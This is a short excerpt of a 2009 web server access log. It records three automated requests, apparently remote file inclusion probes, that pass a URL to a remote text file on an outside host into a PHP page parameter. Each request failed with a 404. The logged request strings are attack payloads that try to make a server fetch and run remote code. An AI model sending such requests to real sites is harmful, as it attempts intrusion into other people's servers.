86.109.170.176 - - [06/Jan/2009:09:20:14 -0800] "GET /logs/index.php?sayfahttp://turkglob.tu.funpic.org/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
86.109.170.176 - - [06/Jan/2009:09:20:15 -0800] "GET /logs/access_080426.log/index.php?sayfahttp://turkglob.tu.funpic.org/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
86.109.170.176 - - [06/Jan/2009:09:20:15 -0800] "GET /logs/index.php?sayfahttp://turkglob.tu.funpic.org/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
